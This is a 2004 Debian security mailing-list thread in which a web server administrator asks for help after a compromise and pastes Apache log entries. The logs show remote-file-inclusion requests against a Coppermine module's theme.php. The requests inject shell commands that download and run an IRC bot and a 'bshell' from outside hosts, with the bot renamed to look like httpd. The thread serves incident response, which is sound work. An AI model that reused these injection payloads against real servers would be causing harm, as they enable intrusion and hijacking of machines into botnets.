Hi all, I did a search in the logs on some of the suspicious users and found a match. The files that are being downloaded then executed see to be IRC bots. http://www.energymech.net/
Here are some log files. 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks equipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" All those executables in the /tmp dir seem to be all coming from that site on our box, definitely the culprit. Can someone explain what is going on here ? Cause it doesn't make any sense. The site in question is a phpnuke site with lots of modules. What steps should I take now ? Thanks very much for everyones help. -- Ross -----Original Message----- From: Ross Tsolakidis Sent: Friday, 18 June 2004 9:20 AM To: [email protected] Subject: RE: Advice needed, trying to find the vulnerable code on Debian webserver. Thanks to everyone who has responded. I will be investigating all these options in the next few days, I'll keep you all informed. -- Ross -----Original Message----- From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp Sent: Thursday, 17 June 2004 3:24 AM To: [EMAIL PROTECTED] Cc: Alvin Oga; [email protected] Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver. On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote: > > > > > > Install some rules for it to harden your webserver, see if > > > anything is flagged in the security log. > > > > other web server testing tools > > http://www.linux-sec.net/Web/#Testing > > Has anyone actually used any of these to find the vulnerabilities that > are being discussed? Not personally, I've used snort and some other custom logging code to find exploit attempts in real time though. Can you tell us what CGI apps are installed upon the box? Or do the access logs should anything suspicious? It's clear that Apache is the route into the system if you have files owned by www-data - maybe mounting /tmp noexec would help? (note: mounting /tmp noexec breaks apt often). Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] DISCLAIMER: This e-mail and any files transmitted with it may be privileged and confidential, and are intended only for the use of the intended recipient. If you are not the intended recipient or responsible for delivering this e-mail to the intended recipient, any use, dissemination, forwarding, printing or copying of this e-mail and any attachments is strictly prohibited. If you have received this e-mail in error, please REPLY TO the SENDER to advise the error AND then DELETE the e-mail from your system. Any views expressed in this e-mail and any files transmitted with it are those of the individual sender, except where the sender specifically states them to be the views of our organisation. Our organisation does not represent or warrant that the attached files are free from computer viruses or other defects. The user assumes all responsibility for any loss or damage resulting directly or indirectly from the use of the attached files. In any event, the liability to our organisation is limited to either the resupply of the attached files or the cost of having the attached files resupplied.
